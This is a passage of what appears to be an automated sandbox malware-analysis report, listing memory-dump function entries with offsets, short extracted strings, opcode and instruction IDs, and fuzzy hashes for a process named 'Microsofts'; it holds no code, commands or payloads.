                                                                                                                                              • String ID: (o]q$(o]q$(o]q$(o]q$,aq$,aq$Haq
                                                                                                                                              • API String ID: 0-105717579
                                                                                                                                              • Opcode ID: b84d1fbacd632b0ee957746e43743ecd52c81d9892b40446082ceede027bceb8
                                                                                                                                              • Instruction ID: 40580d8f3789c57383c387b68529a4d2acc359a0afab8e8090c8d027c019b629
                                                                                                                                              • Opcode Fuzzy Hash: b84d1fbacd632b0ee957746e43743ecd52c81d9892b40446082ceede027bceb8
                                                                                                                                              • Instruction Fuzzy Hash: C9725D70A0021D9FCB14DF69C895EAEBBF7BF88304F148569E855AB3A5DB30D941CB60
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: N
                                                                                                                                              • API String ID: 0-1130791706
                                                                                                                                              • Opcode ID: b0409c180dfd885eaf3b7d7be019ef8ff8aedb501b16541401854b78bad03928
                                                                                                                                              • Instruction ID: 9a118c03ab5ff3b6bd556b3ebee1f5e3b171571146776936c73a5c90daf8351b
                                                                                                                                              • Opcode Fuzzy Hash: b0409c180dfd885eaf3b7d7be019ef8ff8aedb501b16541401854b78bad03928
                                                                                                                                              • Instruction Fuzzy Hash: 6673E831C1075A8ECB11EF68C894AADF7B1FF99300F51D69AE44867261EB70AAD4CF41
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Xaq$Xaq
                                                                                                                                              • API String ID: 0-1488805882
                                                                                                                                              • Opcode ID: d33023339843e1414e65e96ef1d6758581722e4977ccb81aa2105e310f34a1df
                                                                                                                                              • Instruction ID: 5adf2fc531580db60bb784cbc17d856a8c2186f317f81808bff6bc4f23aa8812
                                                                                                                                              • Opcode Fuzzy Hash: d33023339843e1414e65e96ef1d6758581722e4977ccb81aa2105e310f34a1df
                                                                                                                                              • Instruction Fuzzy Hash: D7320411799AD69BFB072B3844C6AE0BF629E5B150BCF58D9D8D0CB99BC50408CFC34A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: PH]q$PH]q
                                                                                                                                              • API String ID: 0-1166926398
                                                                                                                                              • Opcode ID: 4041d0bb387a1a4a050934e1e65f585eb3d672666e847ae76f6fcf88246a1745
                                                                                                                                              • Instruction ID: afb82271c94bab847a9fb1b0bbde5e19df91beb1761c6e6d446b7680e4718f51
                                                                                                                                              • Opcode Fuzzy Hash: 4041d0bb387a1a4a050934e1e65f585eb3d672666e847ae76f6fcf88246a1745
                                                                                                                                              • Instruction Fuzzy Hash: 3381C374E00218DFDB58DFAAD994B9DBBF2BF89304F20806AE419AB354DB345945CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9274f875ed523658c4a556476e8d2fa201f8daa09b03473fde5a8b35540b191b
                                                                                                                                              • Instruction ID: a49c64d020b6ba763f9aeea251d3b167c01492126515c88302c29f4f150515fc
                                                                                                                                              • Opcode Fuzzy Hash: 9274f875ed523658c4a556476e8d2fa201f8daa09b03473fde5a8b35540b191b
                                                                                                                                              • Instruction Fuzzy Hash: 36826C74E012298FDB64DF69DD98B9DBBB2BB89300F1481E9D80DA7265DB305E81CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 50c0f17b01ffa1a0e7ee9892d79b6d4c1d179da7a0dfc5293af2359d8bab54c5
                                                                                                                                              • Instruction ID: ab765f50f91d35a830c555d6ab1ecfea463718d1cddaadd1a19951bd92ee11f9
                                                                                                                                              • Opcode Fuzzy Hash: 50c0f17b01ffa1a0e7ee9892d79b6d4c1d179da7a0dfc5293af2359d8bab54c5
                                                                                                                                              • Instruction Fuzzy Hash: 14C1A174E00218CFDB54DFA5D994B9DBBB2BF88304F2085A9D809A7365DB359E85CF10
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 60550e2c6555233459235cf3e6009b854862d710fc1bc2532a9f6b3cd59098a5
                                                                                                                                              • Instruction ID: af7301ab4a518a13e1e5d23eb43c5606062cbdd641ac40de0ae6e4d30e8a6c9c
                                                                                                                                              • Opcode Fuzzy Hash: 60550e2c6555233459235cf3e6009b854862d710fc1bc2532a9f6b3cd59098a5
                                                                                                                                              • Instruction Fuzzy Hash: CDA11671D106198EDB14DFA9C8847EDFBB1FF89300F10C6AAE45867261EB709A85CF41
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 32fd440fc68fe28a658b5ceb89a5bc69f2971d47c1f24e22708899279dc30a12
                                                                                                                                              • Instruction ID: 4997b91f4a7dce3725c69b2866d13d5fc29ac26357291edaf6f23878ab51866d
                                                                                                                                              • Opcode Fuzzy Hash: 32fd440fc68fe28a658b5ceb89a5bc69f2971d47c1f24e22708899279dc30a12
                                                                                                                                              • Instruction Fuzzy Hash: 7CA1D370D00208CFDB14DFA9C598BEDBBB1BF49314F209269E409A73A2DB749985CF55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9f778e4ab48941f470c0e9456c924d8cb98a2b714326046d11b69a31d85e5acb
                                                                                                                                              • Instruction ID: d73a22f98d5fb97cb4e8e59acf9d378072ab20dedd495ac2753a79bf259bf347
                                                                                                                                              • Opcode Fuzzy Hash: 9f778e4ab48941f470c0e9456c924d8cb98a2b714326046d11b69a31d85e5acb
                                                                                                                                              • Instruction Fuzzy Hash: D7A1E470D00208CFDB14DFA9C598BDDBBB1BF48314F249269E409A73A2DB749985CF55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f14927479b29121c15522014f9b39f76d355583400deed1ed02df03b15b7f3b9
                                                                                                                                              • Instruction ID: 90ae64db5549f876f789abc460b5be692a7d1297395c23ab50c7410ffd2b8edd
                                                                                                                                              • Opcode Fuzzy Hash: f14927479b29121c15522014f9b39f76d355583400deed1ed02df03b15b7f3b9
                                                                                                                                              • Instruction Fuzzy Hash: 5A91C070D00208CFDB10DFA8C598BEDBBB1BF49315F209269E409AB3A2DB749985CF54
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 40c3d110b1ff3cd6720c5a1b6fc973767460c5ab4031eddecd1072c1a7f45605
                                                                                                                                              • Instruction ID: 7f149b18bd2d4075d7339e2e4318c922d9feba0d3afe929e850dadd4a9c8fb93
                                                                                                                                              • Opcode Fuzzy Hash: 40c3d110b1ff3cd6720c5a1b6fc973767460c5ab4031eddecd1072c1a7f45605
                                                                                                                                              • Instruction Fuzzy Hash: 6681A274E412299FDB65DF29DC54BEDBBB2BB89300F1081EAE849A7254DB315E81CF40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f0ca52ee865653f09c9ec0bc6175a6523ba4fb5f4c912f7767fb0bd0084ead66
                                                                                                                                              • Instruction ID: 21177f651b0ed72f72d999a5ba4c52b880985b60d84ddd59670595eb41611c38
                                                                                                                                              • Opcode Fuzzy Hash: f0ca52ee865653f09c9ec0bc6175a6523ba4fb5f4c912f7767fb0bd0084ead66
                                                                                                                                              • Instruction Fuzzy Hash: 8941C374E00208CBDB18DFAAD8547DDFBB2AF88300F24D12AD415AB369DB359946CF54
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 8bq$Haq$Haq$Haq$TJbq
                                                                                                                                              • API String ID: 0-1597716666
                                                                                                                                              • Opcode ID: f4ce74ce0ef970c11ba9e06155736503b68bf0efd95587a373a8df696667a7e4
                                                                                                                                              • Instruction ID: efe762a573c56e3d8818ae929d37441042ee15a47b0a51b517fea93f32ba83b8
                                                                                                                                              • Opcode Fuzzy Hash: f4ce74ce0ef970c11ba9e06155736503b68bf0efd95587a373a8df696667a7e4
                                                                                                                                              • Instruction Fuzzy Hash: 50D1D330B082048FCB15DB68D495BAE7BB2EF89324F1445AAD506EB3E1CB30DC42CB91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                                              • API String ID: 0-1229222154
                                                                                                                                              • Opcode ID: f1fe6a57067e20aefc57d0302393f9db8141b6135bea1d605ee8c5027aace511
                                                                                                                                              • Instruction ID: 8a9c0139f763f67c2990bb86e69fdd30bd0624ca139b2c3d79c43baf624edab8
                                                                                                                                              • Opcode Fuzzy Hash: f1fe6a57067e20aefc57d0302393f9db8141b6135bea1d605ee8c5027aace511
                                                                                                                                              • Instruction Fuzzy Hash: 5951B174E002089FCB58DFA9D584A9DBBF2BF89310F208469E915BB368DB74AC45CF10
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $Haq$Haq$Haq
                                                                                                                                              • API String ID: 0-432640594
                                                                                                                                              • Opcode ID: 97535ddf23331b0554686967f9e75c6579996f1e11a58a1730c14fc040e1e3de
                                                                                                                                              • Instruction ID: f83704c4e3bc68929ddd7ff042b4654f15387e7a84af5fadb9e4c9c1d3fc15d5
                                                                                                                                              • Opcode Fuzzy Hash: 97535ddf23331b0554686967f9e75c6579996f1e11a58a1730c14fc040e1e3de
                                                                                                                                              • Instruction Fuzzy Hash: A861E530B042489FDB156F78945977E7FA3AF85365F24462AE9269B3D0CF348D01C7A2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                                              • API String ID: 0-4015495023
                                                                                                                                              • Opcode ID: b1cb02f98e8b42533e36d72397174c6e5f8d5e3bf9c54955c9fb73e4472da243
                                                                                                                                              • Instruction ID: 245a2b66d849d8b554976433ed4d0a8c9512c106b5fffa8575d30267987409c1
                                                                                                                                              • Opcode Fuzzy Hash: b1cb02f98e8b42533e36d72397174c6e5f8d5e3bf9c54955c9fb73e4472da243
                                                                                                                                              • Instruction Fuzzy Hash: EBB1D720A442AA9BEB175F7C44C17E9BFA29F5B200FCA80D9D49497296D73089CBC752
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $Haq$Haq$Haq
                                                                                                                                              • API String ID: 0-432640594
                                                                                                                                              • Opcode ID: 3a86a1f92e1ccd2cb1a9f2b2e380f6b06dae20989ddef5ee350aeba116dc2028
                                                                                                                                              • Instruction ID: 378a6871923a501bdab45bd159f152a94ce102bf473792366a02bbbe98f93530
                                                                                                                                              • Opcode Fuzzy Hash: 3a86a1f92e1ccd2cb1a9f2b2e380f6b06dae20989ddef5ee350aeba116dc2028
                                                                                                                                              • Instruction Fuzzy Hash: E071C4307042089FDB156F78949877E7AA3FF85369F24462AE9269B3E0CF358D41C762
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o]q$$]q$$]q
                                                                                                                                              • API String ID: 0-989248301
                                                                                                                                              • Opcode ID: 7101dea35deeca157796e3dd60967d9f30e05492cbffedf9df8adbc8495eb710
                                                                                                                                              • Instruction ID: c4f4544e2a21e11680098d8ceea769274ecbfaa5ecc71171d14c1efa6bf4a9ed
                                                                                                                                              • Opcode Fuzzy Hash: 7101dea35deeca157796e3dd60967d9f30e05492cbffedf9df8adbc8495eb710
                                                                                                                                              • Instruction Fuzzy Hash: EA725374A00218CFDB55DBA8C960B9EBBB7FF84340F1080A9D50A6B395DE359D85CF91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Haq$Haq
                                                                                                                                              • API String ID: 0-4016896955
                                                                                                                                              • Opcode ID: 3988778777cf6a5c033052bcc1b12aedc847080e651b53dc536cb5f2de04fe9f
                                                                                                                                              • Instruction ID: a90dd41d1106f111bbb7f3ddcf9c4a49d2f651225e7fb36fbf8fdcc36351758a
                                                                                                                                              • Opcode Fuzzy Hash: 3988778777cf6a5c033052bcc1b12aedc847080e651b53dc536cb5f2de04fe9f
                                                                                                                                              • Instruction Fuzzy Hash: 3FC1EF303042259FCB159F29C899A6EBBB3BF89304F158469E986CB395DB34CC42CB90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,aq$,aq
                                                                                                                                              • API String ID: 0-2990736959
                                                                                                                                              • Opcode ID: c9d43d5696e9b3afb1ae1d13f4b912783e01a356abf1e24ae4bf19ab90d26d33
                                                                                                                                              • Instruction ID: 2e10f2dd1095d2b40630703551f8ea52b2d100e9fe694a55d687c3eed1118cb8
                                                                                                                                              • Opcode Fuzzy Hash: c9d43d5696e9b3afb1ae1d13f4b912783e01a356abf1e24ae4bf19ab90d26d33
                                                                                                                                              • Instruction Fuzzy Hash: BB91D134B041258FCB04DFA9C885E6AB7B2FF89249B298169E456DB375D731EC41CB60
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (&]q$(aq
                                                                                                                                              • API String ID: 0-1602648543
                                                                                                                                              • Opcode ID: fbe50961f2943f783582ba91b819a543979c53b7b496f386748e026d550f6b1b
                                                                                                                                              • Instruction ID: 99011b720eb49bbdc7700e1e08fd76f9e5992fdcb02deb10a68f6d855e4ea0b6
                                                                                                                                              • Opcode Fuzzy Hash: fbe50961f2943f783582ba91b819a543979c53b7b496f386748e026d550f6b1b
                                                                                                                                              • Instruction Fuzzy Hash: BA719231F042199BDB15EFB9C850AEEBBB6BF85740F148529E416A7380DF309D42CB91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 8bq$TJbq
                                                                                                                                              • API String ID: 0-3440557903
                                                                                                                                              • Opcode ID: 4c7eb3f9aac4a90cf34b67faf8b0072ca4b539e4fa556eb570023c53bbb4a68b
                                                                                                                                              • Instruction ID: 73d2f7048f2e05ab0b0701be19dc2186b7037a4ef5e8d290ddcfe0550ef715ec
                                                                                                                                              • Opcode Fuzzy Hash: 4c7eb3f9aac4a90cf34b67faf8b0072ca4b539e4fa556eb570023c53bbb4a68b
                                                                                                                                              • Instruction Fuzzy Hash: E7312435B002098FCB44DFA8D580E9EBBB6EF88324F195555E506AB3B5CB70EC45CBA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 8bq$TJbq
                                                                                                                                              • API String ID: 0-3440557903
                                                                                                                                              • Opcode ID: 89cf7d89891af6e4dfc894c93eeed78961293dba41e8f3aa6b5e874d76051abe
                                                                                                                                              • Instruction ID: 484cf65083fe4cf6bcd75d60ce516073c2baf31d0dbc8fcadae9d86b1cf83ee7
                                                                                                                                              • Opcode Fuzzy Hash: 89cf7d89891af6e4dfc894c93eeed78961293dba41e8f3aa6b5e874d76051abe
                                                                                                                                              • Instruction Fuzzy Hash: 5F314735B402098FCB44DFA8D580E9EBBB6EF88324F155454E505AB3B5CB70EC45CBA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Xaq$Xaq
                                                                                                                                              • API String ID: 0-1488805882
                                                                                                                                              • Opcode ID: 30b454570ac4696b2659c63da73860934aecdf221517925cf8f535954c9aca99
                                                                                                                                              • Instruction ID: f31fc2022d0e2b8917c3e88573751bde895af7bbcd812b23bec663f7a76d7437
                                                                                                                                              • Opcode Fuzzy Hash: 30b454570ac4696b2659c63da73860934aecdf221517925cf8f535954c9aca99
                                                                                                                                              • Instruction Fuzzy Hash: CC11C031B022594BDB294A6A5DDC37BA6AEBFC1718F14443BCD05833A5DF60CC85C2A5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LR]q
                                                                                                                                              • API String ID: 0-3081347316
                                                                                                                                              • Opcode ID: 2f176d2f8c952efc316d910df0c1cd3ed13d61d9630fe03ab7cd404d88aad110
                                                                                                                                              • Instruction ID: 4fedce96e324194bcacb5806cb6193f59ebe30f5cd0b006155b4d5d186793e2a
                                                                                                                                              • Opcode Fuzzy Hash: 2f176d2f8c952efc316d910df0c1cd3ed13d61d9630fe03ab7cd404d88aad110
                                                                                                                                              • Instruction Fuzzy Hash: 09A10B74E4021ACFCF05EFA9E994A9EBBB5FF88341B104629D505AB369DB346D05CF80
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LR]q
                                                                                                                                              • API String ID: 0-3081347316
                                                                                                                                              • Opcode ID: e3f28549a42fee44593be2d5a410b3c903e99e1f4cd620b68a791dfd6a00835a
                                                                                                                                              • Instruction ID: fecd70de4c56414da1531046395d108672f4539ba46a562f3670f445c1b9dee1
                                                                                                                                              • Opcode Fuzzy Hash: e3f28549a42fee44593be2d5a410b3c903e99e1f4cd620b68a791dfd6a00835a
                                                                                                                                              • Instruction Fuzzy Hash: 06A1FA74E4021ACFCF05EFA9E994A9EBBB5FF88341B104629D505A7369DB306D05CF80
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q
                                                                                                                                              • API String ID: 0-1259897404
                                                                                                                                              • Opcode ID: 4ca53a2029fc44843e0e9c51403b479fb170fd2307c185f8b2aabed7411a850a
                                                                                                                                              • Instruction ID: abf84fbbb4491ce326b065ed30c53775bd9426d3bdd6f0cf5e7a749468c090b5
                                                                                                                                              • Opcode Fuzzy Hash: 4ca53a2029fc44843e0e9c51403b479fb170fd2307c185f8b2aabed7411a850a
                                                                                                                                              • Instruction Fuzzy Hash: 27414874600115DFCB14DF29D8A9EAA7BB6BF88324F010069F916DB3A1DB71DE41CB91
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q
                                                                                                                                              • API String ID: 0-1259897404
                                                                                                                                              • Opcode ID: b8fedd91d8c2007d95eeb6cd211ef8d9d158d73651a7c8f93e075c295002a9d6
                                                                                                                                              • Instruction ID: d16e9692294f7e7a88319b07d26b01e2254c5ca6cfd54694023070abe4ffa1cb
                                                                                                                                              • Opcode Fuzzy Hash: b8fedd91d8c2007d95eeb6cd211ef8d9d158d73651a7c8f93e075c295002a9d6
                                                                                                                                              • Instruction Fuzzy Hash: 842194317082598BDB15DF269CA1E7B7BEBBF85264F048536F462E7244D770DC408760
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Haq
                                                                                                                                              • API String ID: 0-725504367
                                                                                                                                              • Opcode ID: 743f047fa135698f6642ef7af23571dc328afbf26d3608a00fe3f9dc83418af6
                                                                                                                                              • Instruction ID: f320c216c46ad82ed999e17fbdff3ddbbde006347338225f0dcc56dad2d9c834
                                                                                                                                              • Opcode Fuzzy Hash: 743f047fa135698f6642ef7af23571dc328afbf26d3608a00fe3f9dc83418af6
                                                                                                                                              • Instruction Fuzzy Hash: 3421B4347442499FC704DF69D894B6EBBB6FF89305F1480AAD6468B3A1DF319D42CB90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Haq
                                                                                                                                              • API String ID: 0-725504367
                                                                                                                                              • Opcode ID: de44d3024ad278a1026c3df75065aa64e01145e33e27311ed55df8f0ebd55d47
                                                                                                                                              • Instruction ID: aa929ff6893ff47dc569b4dc01b12e92a40841742186f0eb6f3047f611bb02fe
                                                                                                                                              • Opcode Fuzzy Hash: de44d3024ad278a1026c3df75065aa64e01145e33e27311ed55df8f0ebd55d47
                                                                                                                                              • Instruction Fuzzy Hash: 7D219071B001099FCB44EFB9D855ABEBBB6EF88300F148469E515D7365DE309E02CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
